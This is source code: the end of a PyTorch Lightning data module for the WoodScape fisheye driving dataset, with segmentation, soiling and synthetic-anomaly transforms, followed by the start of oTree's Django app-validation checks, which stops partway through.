PIL.Image.open(gt_label_path)\n\n # starts here 1:\n # image = self.img_transforms(image)\n # image = image.float()\n #\n # gt_label_np = np.asarray(gt_label)\n # gt_label_tensor = torch.LongTensor(np.array(gt_label_np, copy=True))\n # gt_label_tensor = gt_label_tensor.unsqueeze(0)\n # gt_label_tensor = self.label_transforms(gt_label_tensor)\n\n # starts here 2:\n if self.img_transforms:\n image = self.img_transforms(image)\n image = image.float()\n\n if self.label_transforms:\n gt_label = np.asarray(gt_label)\n gt_label = torch.LongTensor(np.array(gt_label, copy=True))\n gt_label = gt_label.unsqueeze(0)\n gt_label = self.label_transforms(gt_label)\n\n if self.img_mask_transforms:\n transformed = self.img_mask_transforms(\n image=np.asarray(image), mask=np.asarray(gt_label)\n )\n image = transformed[\"image\"]\n gt_label = transformed[\"mask\"]\n gt_label = gt_label.unsqueeze(dim=0)\n\n # return image, gt_label_tensor\n return image, gt_label\n\n def decode_segmap(self, temp: np.ndarray):\n temp = temp.squeeze()\n r = temp.copy()\n g = temp.copy()\n b = temp.copy()\n for l in range(0, self.n_classes):\n r[temp == l] = self.label_colours[l][0]\n g[temp == l] = self.label_colours[l][1]\n b[temp == l] = self.label_colours[l][2]\n\n rgb = np.zeros((temp.shape[0], temp.shape[1], 3))\n rgb[:, :, 0] = r / 255.0\n rgb[:, :, 1] = g / 255.0\n rgb[:, :, 2] = b / 255.0\n return rgb\n\n\nclass WoodScapeDataModule(LightningDataModule):\n name = \"WoodScape\"\n extra_args: dict = {}\n\n def __init__(\n self,\n dataset_dir: str,\n target_type: str = \"semantic\",\n num_workers: int = 10,\n batch_size: int = 32,\n valid_size: float = 0.2,\n test_size: float = 0.1,\n seed: int = 10,\n img_size: tuple = (150, 300),\n shuffle: bool = False,\n pin_memory: bool = True,\n drop_last: bool = False,\n default_transforms: bool = False,\n default_img_mask_transforms: bool = False,\n img_transforms_train: transforms = None,\n img_transforms_valid: transforms = None,\n label_colours: dict = None,\n norm_mean: list = None,\n norm_std: list = None,\n *args: Any,\n **kwargs: Any,\n ):\n super().__init__(*args, **kwargs)\n\n self.dataset_dir = dataset_dir\n self.target_type = target_type\n self.num_workers = num_workers\n self.batch_size = batch_size\n self.valid_size = valid_size\n self.test_size = test_size\n self.default_transforms = default_transforms\n self.default_img_mask_transforms = default_img_mask_transforms\n self.label_transforms = None\n self.seed = seed\n self.img_size = img_size\n self.shuffle = shuffle\n self.pin_memory = pin_memory\n self.drop_last = drop_last\n self.woodscape_ds_train = None\n self.woodscape_ds_valid = None\n self.woodscape_anomaly_ds = None\n self.train_sampler = None\n self.valid_sampler = None\n self.test_sampler = None\n\n self.label_colours = label_colours\n\n self.train_loader_len = 0\n self.valid_loader_len = 0\n self.test_loader_len = 0\n self.anomaly_valid_loader_len = 0\n self.anomaly_test_loader_len = 0\n\n if norm_mean is None and norm_std is None:\n self.norm_mean = [0.32757252, 0.33050337, 0.33689716]\n self.norm_std = [0.20290555, 0.20525302, 0.2037721]\n else:\n self.norm_mean = norm_mean\n self.norm_std = norm_std\n\n if self.default_transforms: # default transforms is True\n self.img_transforms_train = self._default_img_transforms()\n self.img_transforms_valid = self._default_img_transforms()\n self.label_transforms = self._default_label_transforms()\n\n elif self.default_img_mask_transforms:\n self.img_transforms_train = self._train_default_img_mask_transforms()\n 
self.img_transforms_valid = self._val_default_img_mask_transforms()\n\n else: # default transforms is False\n self.img_transforms_train = img_transforms_train\n self.img_transforms_valid = img_transforms_valid\n # self.label_transforms_train = label_transforms_train\n # self.label_transforms_train = img_transforms_train\n self.label_transforms = self._default_label_transforms()\n # self.label_transforms_valid = label_transforms_valid\n\n self.save_hyperparameters()\n\n def setup(self, stage: Optional[str] = None) -> None:\n # Assign train/val datasets for use in dataloaders\n if stage == \"fit\" or stage is None:\n self.woodscape_ds_train = WoodScapeDataset(\n dataset_dir=self.dataset_dir,\n img_size=self.img_size,\n img_transforms=self.img_transforms_train,\n label_transforms=self.label_transforms,\n label_colours=self.label_colours,\n )\n\n self.woodscape_ds_valid = WoodScapeDataset(\n dataset_dir=self.dataset_dir,\n img_size=self.img_size,\n img_transforms=self.img_transforms_valid,\n label_transforms=self.label_transforms,\n label_colours=self.label_colours,\n )\n\n self.woodscape_anomaly_ds = WoodScapeDataset(\n dataset_dir=self.dataset_dir,\n img_size=self.img_size,\n img_transforms=None,\n label_transforms=None,\n img_mask_transforms=self._anomaly_transforms(),\n label_colours=self.label_colours,\n )\n\n # get dataset length (woodscape_ds_train and woodscape_ds_valid are the same):\n dataset_len = len(self.woodscape_ds_train)\n # get indices\n indices = list(range(dataset_len))\n # indices random shuffle\n print(\"DATASET Shuffle Random SEED: \", self.seed)\n random.seed(self.seed)\n random.shuffle(indices)\n # split dataset into train subset and test set:\n split = int(np.floor(self.test_size * dataset_len))\n train_ss_idx, test_idx = indices[split:], indices[:split]\n # split train subset into train set and validation set:\n train_set_len = len(train_ss_idx)\n split_train = int(np.floor(self.valid_size * train_set_len))\n train_idx, valid_idx = train_ss_idx[split_train:], train_ss_idx[:split_train]\n # define samplers for obtaining training and validation batches\n self.train_sampler = SubsetRandomSampler(train_idx)\n self.valid_sampler = SubsetRandomSampler(\n valid_idx\n ) # Sampler is useful for woodscape_ds_valid\n self.test_sampler = SubsetRandomSampler(test_idx)\n\n # Assign test dataset for use in dataloader(s)\n if stage == \"test\" or stage is None:\n pass\n # dataset_test = WoodScapeDataset(dataset_dir=self.dataset_dir)\n # TODO: add test set when available from data provider\n\n def train_dataloader(self) -> DataLoader:\n woodscape_train_loader = DataLoader(\n self.woodscape_ds_train,\n batch_size=self.batch_size,\n sampler=self.train_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.train_loader_len = len(woodscape_train_loader)\n return woodscape_train_loader\n\n def val_dataloader(self) -> DataLoader:\n woodscape_valid_loader = DataLoader(\n self.woodscape_ds_valid,\n batch_size=self.batch_size,\n sampler=self.valid_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.valid_loader_len = len(woodscape_valid_loader)\n return woodscape_valid_loader\n\n def test_dataloader(self) -> DataLoader:\n # TODO: add test dataloader when available from data provider\n woodscape_test_loader = DataLoader(\n self.woodscape_ds_train,\n batch_size=self.batch_size,\n sampler=self.test_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n 
drop_last=self.drop_last,\n )\n self.test_loader_len = len(woodscape_test_loader)\n return woodscape_test_loader\n\n def anomaly_val_dataloader(self) -> DataLoader:\n ws_anomaly_valid_loader = DataLoader(\n self.woodscape_anomaly_ds,\n batch_size=self.batch_size,\n sampler=self.valid_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.anomaly_valid_loader_len = len(ws_anomaly_valid_loader)\n return ws_anomaly_valid_loader\n\n def anomaly_test_dataloader(self) -> DataLoader:\n # TODO: add test dataloader when available from data provider\n ws_anomaly_test_loader = DataLoader(\n self.woodscape_anomaly_ds,\n batch_size=self.batch_size,\n sampler=self.test_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.anomaly_test_loader_len = len(ws_anomaly_test_loader)\n return ws_anomaly_test_loader\n\n def _default_img_transforms(self):\n woodscape_img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=self.norm_mean, std=self.norm_std),\n ]\n )\n return woodscape_img_transforms\n\n def _default_label_transforms(self):\n woodscape_label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n return woodscape_label_transforms\n\n def _train_default_img_mask_transforms(self) -> Callable:\n woodscape_train_img_mask_transforms = A.Compose(\n [\n A.Resize(self.img_size[0], self.img_size[1], p=1.0),\n # A.OneOf([\n # A.Resize(self.img_size[0], self.img_size[1], p=1.0),\n # A.RandomResizedCrop(self.img_size[0], self.img_size[1], p=1.0),\n # ], p=1.0),\n # A.Resize(self.img_size[0], self.img_size[1]),\n # # A.RandomResizedCrop(self.img_size[0], self.img_size[1], p=1),\n A.OneOf(\n [\n A.RandomResizedCrop(self.img_size[0], self.img_size[1], p=0.5),\n A.HorizontalFlip(p=0.5),\n A.HueSaturationValue(p=0.5),\n A.RandomBrightnessContrast(p=0.5),\n ],\n p=0.5,\n ),\n A.Normalize(mean=self.norm_mean, std=self.norm_std),\n ToTensorV2(),\n ]\n )\n\n return woodscape_train_img_mask_transforms\n\n def _val_default_img_mask_transforms(self) -> Callable:\n woodscape_val_img_mask_transforms = A.Compose(\n [\n A.Resize(self.img_size[0], self.img_size[1]),\n A.Normalize(mean=self.norm_mean, std=self.norm_std),\n ToTensorV2(),\n ]\n )\n\n return woodscape_val_img_mask_transforms\n\n def _anomaly_transforms(self) -> Callable:\n woodscape_anomaly_transforms = A.Compose(\n [\n A.Resize(self.img_size[0], self.img_size[1], p=1),\n A.OneOf(\n [\n AnomalyMud(\n anomaly_width=self.img_size[1], anomaly_height=self.img_size[0], p=1\n ),\n A.RandomFog(fog_coef_lower=0.7, fog_coef_upper=0.8, alpha_coef=0.6, p=1),\n A.RandomSunFlare(\n flare_roi=(0.2, 0.2, 0.8, 0.8),\n src_radius=int(self.img_size[1] * 0.7),\n num_flare_circles_lower=6,\n num_flare_circles_upper=12,\n angle_lower=0.5,\n p=1,\n ),\n ],\n p=1,\n ),\n A.Normalize(mean=self.norm_mean, std=self.norm_std),\n ToTensorV2(),\n ]\n )\n return woodscape_anomaly_transforms\n\n def unprocess_image(self, im, return_array=True):\n # im = im.squeeze().numpy().transpose((1, 2, 0))\n im = im.squeeze().numpy().transpose((1, 2, 0))\n im = self.norm_std * im + self.norm_mean\n im = np.clip(im, 0, 1)\n im = im * 255\n im = im.astype(np.uint8)\n if return_array:\n return im\n else:\n return PIL.Image.fromarray(im)\n\n\nclass WoodScapeSoilingDataset(Dataset):\n def __init__(\n self,\n dataset_dir: str,\n train: bool = True,\n img_size: tuple = (150, 300),\n default_transforms=False,\n 
img_transforms=None,\n label_transforms=None,\n ) -> None:\n super().__init__()\n self.class_names = [\"clear\", \"transparent\", \"semi_transparent\", \"opaque\"]\n\n self.n_classes = 4\n\n self.class_colors_rgb = [[0, 0, 0], [0, 255, 0], [255, 0, 0], [0, 0, 255]] # RGB format!\n\n self.class_colors_bgr = [[0, 0, 0], [0, 255, 0], [0, 0, 255], [255, 0, 0]] # BGR format!\n\n self.label_colours = dict(zip(range(4), self.class_colors_rgb))\n self.class_indexes = [0, 1, 2, 3]\n\n self.dataset_dir = dataset_dir\n self.train = train\n\n if self.train:\n self.dataset_dir = os.path.join(self.dataset_dir, \"train\")\n else:\n self.dataset_dir = os.path.join(self.dataset_dir, \"test\")\n\n self.rgb_soil_images_dir = os.path.join(self.dataset_dir, \"rgbImages\")\n self.rgb_soil_images_list = glob.glob(os.path.join(self.rgb_soil_images_dir, \"*.png\"))\n self.rgb_soil_images_list.sort()\n ic(len(self.rgb_soil_images_list))\n\n self.soil_annotations_gt_dir = os.path.join(self.dataset_dir, \"gtLabels\")\n self.soil_annotations_gt_list = glob.glob(\n os.path.join(self.soil_annotations_gt_dir, \"*.png\")\n )\n self.soil_annotations_gt_list.sort()\n ic(len(self.soil_annotations_gt_list))\n\n self.soil_annotations_rgb_dir = os.path.join(self.dataset_dir, \"rgbLabels\")\n self.soil_annotations_rgb_list = glob.glob(\n os.path.join(self.soil_annotations_rgb_dir, \"*.png\")\n )\n self.soil_annotations_rgb_list.sort()\n ic(len(self.soil_annotations_rgb_list))\n\n self.img_size = img_size\n if self.img_size is None:\n self.img_size = (150, 300)\n\n self.default_transforms = default_transforms\n\n if self.default_transforms:\n self.img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.32757252, 0.33050337, 0.33689716],\n std=[0.20290555, 0.20525302, 0.2037721],\n ),\n ]\n )\n self.label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n else:\n self.img_transforms = img_transforms\n self.label_transforms = label_transforms\n\n def __len__(self):\n \"\"\"__len__\"\"\"\n return len(self.rgb_soil_images_list)\n\n def __getitem__(self, index):\n # get image path\n img_path = self.rgb_soil_images_list[index]\n gt_label_path = self.soil_annotations_gt_list[index]\n\n image = PIL.Image.open(img_path).convert(\"RGB\")\n gt_label = PIL.Image.open(gt_label_path)\n\n image = self.img_transforms(image)\n image = image.float()\n\n gt_label_np = np.asarray(gt_label)\n gt_label_tensor = torch.LongTensor(np.array(gt_label_np, copy=True))\n gt_label_tensor = gt_label_tensor.unsqueeze(0)\n gt_label_tensor = self.label_transforms(gt_label_tensor)\n\n return image, gt_label_tensor\n\n def decode_segmap(self, temp: np.ndarray):\n temp = temp.squeeze()\n r = temp.copy()\n g = temp.copy()\n b = temp.copy()\n for l in range(0, self.n_classes):\n r[temp == l] = self.label_colours[l][0]\n g[temp == l] = self.label_colours[l][1]\n b[temp == l] = self.label_colours[l][2]\n\n rgb = np.zeros((temp.shape[0], temp.shape[1], 3))\n rgb[:, :, 0] = r / 255.0\n rgb[:, :, 1] = g / 255.0\n rgb[:, :, 2] = b / 255.0\n return rgb\n\n\nclass WoodScapeSoilingDataModule(LightningDataModule):\n name = \"WoodScape-Soiling\"\n extra_args: dict = {}\n\n def __init__(\n self,\n dataset_dir: str,\n num_workers: int = 10,\n batch_size: int = 32,\n valid_size: float = 0.2,\n seed: int = 10,\n img_size: tuple = (150, 300),\n shuffle: bool = False,\n pin_memory: bool = True,\n drop_last: bool = False,\n img_transforms: transforms = None,\n label_transforms: transforms 
= None,\n default_transforms: bool = False,\n *args: Any,\n **kwargs: Any,\n ):\n super().__init__(*args, **kwargs)\n self.dataset_dir = dataset_dir\n self.num_workers = num_workers\n self.batch_size = batch_size\n self.valid_size = valid_size\n self.default_transforms = default_transforms\n self.seed = seed\n self.img_size = img_size\n self.shuffle = shuffle\n self.pin_memory = pin_memory\n self.drop_last = drop_last\n self.woodscape_soil_ds_train = None\n self.woodscape_soil_ds_valid = None\n self.woodscape_soil_ds_test = None\n self.train_sampler = None\n self.valid_sampler = None\n\n if self.default_transforms:\n self.img_transforms = self._default_img_transforms()\n self.label_transforms = self._default_label_transforms()\n else:\n self.img_transforms = img_transforms\n self.label_transforms = label_transforms\n\n def setup(self, stage: Optional[str] = None) -> None:\n # Assign train/val datasets for use in dataloaders\n if stage == \"fit\" or stage is None:\n self.woodscape_soil_ds_train = WoodScapeSoilingDataset(\n dataset_dir=self.dataset_dir,\n train=True,\n img_size=self.img_size,\n img_transforms=self.img_transforms,\n label_transforms=self.label_transforms,\n )\n # get dataset length\n dataset_train_len = len(self.woodscape_soil_ds_train)\n ic(dataset_train_len)\n\n # get indices\n indices = list(range(dataset_train_len))\n # indices random shuffle\n print(\"DATASET Shuffle Random SEED: \", self.seed)\n random.seed(self.seed)\n random.shuffle(indices)\n # split\n split = int(np.floor(self.valid_size * dataset_train_len))\n train_idx, valid_idx = indices[split:], indices[:split]\n # define samplers for obtaining training and validation batches\n self.train_sampler = SubsetRandomSampler(train_idx)\n self.valid_sampler = SubsetRandomSampler(valid_idx)\n # Assign test dataset for use in dataloader(s)\n if stage == \"test\" or stage is None:\n self.woodscape_soil_ds_test = WoodScapeSoilingDataset(\n dataset_dir=self.dataset_dir,\n train=False,\n img_size=self.img_size,\n img_transforms=self.img_transforms,\n label_transforms=self.label_transforms,\n )\n dataset_test_len = len(self.woodscape_soil_ds_test)\n ic(dataset_test_len)\n\n def train_dataloader(self) -> DataLoader:\n woodscape_soil_train_loader = DataLoader(\n self.woodscape_soil_ds_train,\n batch_size=self.batch_size,\n sampler=self.train_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n return woodscape_soil_train_loader\n\n def val_dataloader(self) -> DataLoader:\n woodscape_soil_valid_loader = DataLoader(\n self.woodscape_soil_ds_train,\n batch_size=self.batch_size,\n sampler=self.valid_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n return woodscape_soil_valid_loader\n\n def test_dataloader(self) -> DataLoader:\n woodscape_soil_test_loader = DataLoader(\n self.woodscape_soil_ds_test,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n return woodscape_soil_test_loader\n\n def _default_img_transforms(self):\n woodscape_img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.32757252, 0.33050337, 0.33689716],\n std=[0.20290555, 0.20525302, 0.2037721],\n ),\n ]\n )\n return woodscape_img_transforms\n\n def _default_label_transforms(self):\n woodscape_label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n return woodscape_label_transforms\n\n 
def unprocess_image(self, im, return_array=True):\n # im = im.squeeze().numpy().transpose((1, 2, 0))\n im = im.squeeze().numpy().transpose((1, 2, 0))\n im = np.array([0.20290555, 0.20525302, 0.2037721]) * im + np.array(\n [0.32757252, 0.33050337, 0.33689716]\n )\n im = np.clip(im, 0, 1)\n im = im * 255\n im = im.astype(np.uint8)\n if return_array:\n return im\n else:\n return PIL.Image.fromarray(im)\n\n\n# Woodscape Unit-Test\ndef main():\n woodscape_ds = WoodScapeDataset(dataset_dir=\"/media/farnez/Data/DATASETS/WoodScape/\")\n print(woodscape_ds.rgb_images_list)\n pass\n\n\n# Woodscape Unit-Test\nif __name__ == \"__main__\":\n main()\n","repo_name":"danielm322/OoO_Detection","sub_path":"examples/dataset_utils/woodscape.py","file_name":"woodscape.py","file_ext":"py","file_size_in_byte":27088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2861150344","text":"import inspect\r\nimport io\r\nimport os\r\n\r\nfrom otree import common_internal\r\nfrom importlib import import_module\r\n\r\nfrom django.apps import apps\r\nfrom django.conf import settings\r\nfrom django.core.checks import register, Error, Warning\r\nimport django.db.models.fields\r\nfrom otree.api import (\r\n BasePlayer, BaseGroup, BaseSubsession, Currency, WaitPage, Page)\r\nfrom otree.common_internal import _get_all_configs\r\nfrom pathlib import Path\r\nimport re\r\n\r\n\r\nclass AppCheckHelper:\r\n \"\"\"Basically a wrapper around the AppConfig\r\n \"\"\"\r\n\r\n def __init__(self, app_config, errors):\r\n self.app_config = app_config\r\n self.errors = errors\r\n\r\n def add_error(self, title, numeric_id: int, **kwargs):\r\n issue_id = 'otree.E' + str(numeric_id).zfill(3)\r\n kwargs.setdefault('obj', self.app_config.label)\r\n return self.errors.append(Error(title, id=issue_id, **kwargs))\r\n\r\n def add_warning(self, title, numeric_id: int, **kwargs):\r\n kwargs.setdefault('obj', self.app_config.label)\r\n issue_id = 'otree.W' + str(numeric_id).zfill(3)\r\n return self.errors.append(Warning(title, id=issue_id, **kwargs))\r\n\r\n # Helper meythods\r\n\r\n def get_path(self, name):\r\n return os.path.join(self.app_config.path, name)\r\n\r\n def get_rel_path(self, name):\r\n basepath = os.getcwd()\r\n return os.path.relpath(name, basepath)\r\n\r\n def get_module(self, name):\r\n return import_module(self.app_config.name + '.' + name)\r\n\r\n def get_template_names(self):\r\n path = self.get_path('templates')\r\n template_names = []\r\n for root, dirs, files in os.walk(path):\r\n for filename in [f for f in files if f.endswith('.html')]:\r\n template_names.append(os.path.join(root, filename))\r\n return template_names\r\n\r\n def module_exists(self, module):\r\n try:\r\n self.get_module(module)\r\n return True\r\n except ImportError as e:\r\n return False\r\n\r\n def class_exists(self, module, name):\r\n module = self.get_module(module)\r\n cls = getattr(module, name, None)\r\n return inspect.isclass(cls)\r\n\r\n\r\n# CHECKS\r\n\r\ndef files(helper: AppCheckHelper, **kwargs):\r\n # don't check views.py because it might be pages.py\r\n for fn in ['models.py']:\r\n if not os.path.isfile(helper.get_path(fn)):\r\n helper.add_error(\r\n 'No \"%s\" file found in game folder' % fn,\r\n numeric_id=102\r\n )\r\n\r\n templates_dir = Path(helper.get_path('templates'))\r\n app_label = helper.app_config.label\r\n if templates_dir.is_dir():\r\n # check for files in templates/, but not in templates/\r\n misplaced_files = list(templates_dir.glob('*.html'))\r\n if misplaced_files:\r\n hint = (\r\n 'Move template files from \"{app}/templates/\" '\r\n 'to \"{app}/templates/{app}\" subfolder'.format(\r\n app=app_label)\r\n )\r\n\r\n helper.add_error(\r\n \"Templates files in wrong folder\",\r\n hint=hint, numeric_id=103,\r\n )\r\n\r\n all_subfolders = set(templates_dir.glob('*/'))\r\n correctly_named_subfolders = set(\r\n templates_dir.glob('{}/'.format(app_label)))\r\n other_subfolders = all_subfolders - correctly_named_subfolders\r\n if other_subfolders and not correctly_named_subfolders:\r\n msg = (\r\n \"The 'templates' folder has a subfolder called '{}', \"\r\n \"but it should be renamed '{}' to match the name of the app. 
\"\r\n ).format(other_subfolders.pop().name, app_label)\r\n helper.add_error(msg, numeric_id=104)\r\n\r\n\r\nbase_model_attrs = {\r\n 'Player': set(dir(BasePlayer)),\r\n 'Group': set(dir(BaseGroup)),\r\n 'Subsession': set(dir(BaseSubsession)),\r\n}\r\n\r\nmodel_field_substitutes = {\r\n int: 'IntegerField',\r\n float: 'FloatField',\r\n bool: 'BooleanField',\r\n str: 'CharField',\r\n Currency: 'CurrencyField',\r\n type(None): 'IntegerField'\r\n # not always int, but it's a reasonable suggestion\r\n}\r\n\r\n\r\ndef model_classes(helper: AppCheckHelper, **kwargs):\r\n for name in ['Subsession', 'Group', 'Player']:\r\n try:\r\n helper.app_config.get_model(name)\r\n except LookupError:\r\n helper.add_error(\r\n 'MissingModel: Model \"%s\" not defined' % name, numeric_id=110)\r\n\r\n app_config = helper.app_config\r\n Player = app_config.get_model('Player')\r\n Group = app_config.get_model('Group')\r\n Subsession = app_config.get_model('Subsession')\r\n\r\n for Model in [Player, Group, Subsession]:\r\n for attr_name in dir(Model):\r\n if attr_name not in base_model_attrs[Model.__name__]:\r\n try:\r\n attr_value = getattr(Model, attr_name)\r\n _type = type(attr_value)\r\n except AttributeError:\r\n # I got \"The 'q_country' attribute can only be accessed\r\n # from Player instances.\"\r\n # can just filter/ignore these.\r\n pass\r\n else:\r\n if _type in model_field_substitutes.keys():\r\n msg = (\r\n 'NonModelFieldAttr: '\r\n '{} has attribute \"{}\", which is not a model field, '\r\n 'and will therefore not be saved '\r\n 'to the database.'.format(Model.__name__,\r\n attr_name))\r\n\r\n helper.add_error(\r\n msg,\r\n numeric_id=111,\r\n hint='Consider changing to \"{} = models.{}(initial={})\"'.format(\r\n attr_name, model_field_substitutes[_type],\r\n repr(getattr(Model, attr_name)))\r\n )\r\n # if people just need an iterable of choices for a model field,\r\n # they should use a tuple, not list or dict\r\n elif _type in {list, dict, set}:\r\n warning = (\r\n 'MutableModelClassAttr: '\r\n '{ModelName}.{attr} is a {type_name}. '\r\n 'Modifying it during a session (e.g. appending or setting values) '\r\n 'will have unpredictable results; '\r\n 'you should use '\r\n 'session.vars or participant.vars instead. '\r\n 'Or, if this {type_name} is read-only, '\r\n \"then it's recommended to move it outside of this class \"\r\n '(e.g. 
put it in Constants).'\r\n ).format(ModelName=Model.__name__,\r\n attr=attr_name,\r\n type_name=_type.__name__)\r\n\r\n helper.add_error(warning, numeric_id=112)\r\n # isinstance(X, type) means X is a class, not instance\r\n elif (isinstance(attr_value, type) and\r\n issubclass(attr_value,\r\n django.db.models.fields.Field)):\r\n msg = (\r\n '{}.{} is missing parentheses.'\r\n ).format(Model.__name__, attr_name)\r\n helper.add_error(\r\n msg, numeric_id=113,\r\n hint=(\r\n 'Consider changing to \"{} = models.{}()\"'\r\n ).format(attr_name, attr_value.__name__)\r\n )\r\n\r\n\r\ndef constants(helper: AppCheckHelper, **kwargs):\r\n if not helper.module_exists('models'):\r\n return\r\n if not helper.class_exists('models', 'Constants'):\r\n helper.add_error(\r\n 'models.py does not contain Constants class', numeric_id=11\r\n )\r\n return\r\n\r\n models = helper.get_module('models')\r\n Constants = getattr(models, 'Constants')\r\n attrs = ['name_in_url', 'players_per_group', 'num_rounds']\r\n for attr_name in attrs:\r\n if not hasattr(Constants, attr_name):\r\n msg = \"models.py: 'Constants' class needs to define '{}'\"\r\n helper.add_error(msg.format(attr_name), numeric_id=12)\r\n ppg = Constants.players_per_group\r\n if ppg == 0 or ppg == 1:\r\n helper.add_error(\r\n \"models.py: Constants.players_per_group cannot be {}. You \"\r\n \"should set it to None, which makes the group \"\r\n \"all players in the subsession.\".format(ppg),\r\n numeric_id=13\r\n )\r\n if ' ' in Constants.name_in_url:\r\n helper.add_error(\r\n \"models.py: Constants.name_in_url must not contain spaces\",\r\n numeric_id=14\r\n )\r\n\r\n\r\ndef pages_function(helper: AppCheckHelper, **kwargs):\r\n pages_module = common_internal.get_pages_module(helper.app_config.name)\r\n views_or_pages = pages_module.__name__.split('.')[-1]\r\n try:\r\n page_list = pages_module.page_sequence\r\n except:\r\n helper.add_error(\r\n '{}.py is missing the variable page_sequence.'.format(\r\n views_or_pages),\r\n numeric_id=21\r\n )\r\n return\r\n else:\r\n for i, ViewCls in enumerate(page_list):\r\n # there is no good reason to include Page in page_sequence.\r\n # As for WaitPage: even though it works fine currently\r\n # and can save the effort of subclassing,\r\n # we should restrict it, because:\r\n # - one user had \"class WaitPage(Page):\".\r\n # - if someone makes \"class WaitPage(WaitPage):\", they might\r\n # not realize why it's inheriting the extra behavior.\r\n # overall, I think the small inconvenience of having to subclass\r\n # once per app\r\n # is outweighed by the unexpected behavior if someone subclasses\r\n # it without understanding inheritance.\r\n # BUT: built-in Trust game had a wait page called WaitPage.\r\n # that was fixed on Aug 24, 2017, need to wait a while...\r\n # see below in ensure_no_misspelled_attributes,\r\n # we can get rid of a check there also\r\n if ViewCls.__name__ == 'Page':\r\n msg = (\r\n \"page_sequence cannot contain \"\r\n \"a class called 'Page'.\"\r\n )\r\n helper.add_error(msg, numeric_id=22)\r\n if ViewCls.__name__ == 'WaitPage' and helper.app_config.name != 'trust':\r\n msg = (\r\n \"page_sequence cannot contain \"\r\n \"a class called 'WaitPage'.\"\r\n )\r\n helper.add_error(msg, numeric_id=221)\r\n\r\n if issubclass(ViewCls, WaitPage):\r\n if ViewCls.group_by_arrival_time:\r\n if i > 0:\r\n helper.add_error(\r\n '\"{}\" has group_by_arrival_time=True, so '\r\n 'it must be placed first in page_sequence.'.format(\r\n ViewCls.__name__), numeric_id=23)\r\n if ViewCls.wait_for_all_groups:\r\n 
helper.add_error(\r\n 'Page \"{}\" has group_by_arrival_time=True, so '\r\n 'it cannot have wait_for_all_groups=True also.'.format(\r\n ViewCls.__name__), numeric_id=24)\r\n # alternative technique is to not define the method on WaitPage\r\n # and then use hasattr, but I want to keep all complexity\r\n # out of views.abstract\r\n elif (\r\n ViewCls.get_players_for_group != WaitPage.get_players_for_group):\r\n helper.add_error(\r\n 'Page \"{}\" defines get_players_for_group, '\r\n 'but in order to use this method, you must set '\r\n 'group_by_arrival_time=True'.format(\r\n ViewCls.__name__), numeric_id=25)\r\n elif issubclass(ViewCls, Page):\r\n pass # ok\r\n else:\r\n msg = '\"{}\" is not a valid page'.format(ViewCls)\r\n helper.add_error(msg, numeric_id=26)\r\n\r\n ensure_no_misspelled_attributes(ViewCls, helper)\r\n\r\n\r\ndef ensure_no_misspelled_attributes(ViewCls: type, helper: AppCheckHelper):\r\n '''just a helper function'''\r\n\r\n # this messes with the logic of base classes.\r\n # do this instead of ViewCls == WaitPage, because _builtin already\r\n # subclasses it, so you would get a warning like:\r\n # Page \"WaitPage\" has the following method that is not recognized by oTree:\r\n # \"z_autocomplete\".\r\n if ViewCls.__name__ == 'WaitPage' or ViewCls.__name__ == 'Page':\r\n return\r\n\r\n # make sure no misspelled attributes\r\n base_members = set()\r\n for Cls in ViewCls.__bases__:\r\n base_members.update(dir(Cls))\r\n child_members = set(dir(ViewCls))\r\n child_only_members = child_members - base_members\r\n\r\n dynamic_form_methods = set() # needs to be a set\r\n for member in child_only_members:\r\n # error_message, not _error_message\r\n for valid_ending in ['error_message', '_min', '_max', '_choices']:\r\n if member.endswith(valid_ending):\r\n dynamic_form_methods.add(member)\r\n invalid_members = child_only_members - dynamic_form_methods\r\n if invalid_members:\r\n ALLOW_CUSTOM_ATTRIBUTES = '_allow_custom_attributes'\r\n if getattr(ViewCls, ALLOW_CUSTOM_ATTRIBUTES, False):\r\n return\r\n\r\n page_attrs = set(dir(Page))\r\n wait_page_attrs = set(dir(WaitPage))\r\n ATTRS_ON_PAGE_ONLY = page_attrs - wait_page_attrs\r\n ATTRS_ON_WAITPAGE_ONLY = wait_page_attrs - page_attrs\r\n\r\n for member in invalid_members:\r\n # this assumes that ViewCls is a Page or WaitPage\r\n if member in ATTRS_ON_PAGE_ONLY:\r\n assert issubclass(ViewCls, WaitPage), (ViewCls, member)\r\n msg = (\r\n 'WaitPage \"{ViewClsName}\" has the attribute \"{member}\" that is not '\r\n 'allowed on a WaitPage. '\r\n )\r\n numeric_id = 27\r\n elif member in ATTRS_ON_WAITPAGE_ONLY:\r\n assert issubclass(ViewCls, Page), (ViewCls, member)\r\n msg = (\r\n 'Page \"{ViewClsName}\" has the attribute \"{member}\" that is '\r\n 'only allowed on a WaitPage, not a regular Page. '\r\n )\r\n numeric_id=271\r\n elif callable(getattr(ViewCls, member)):\r\n msg = (\r\n 'Page \"{ViewClsName}\" has the following method that is not '\r\n 'recognized by oTree: \"{member}\". '\r\n 'Consider moving it into '\r\n 'the Player class in models.py. '\r\n )\r\n\r\n numeric_id=28\r\n else:\r\n msg = (\r\n 'Page \"{ViewClsName}\" has the following attribute that is not '\r\n 'recognized by oTree: \"{member}\". 
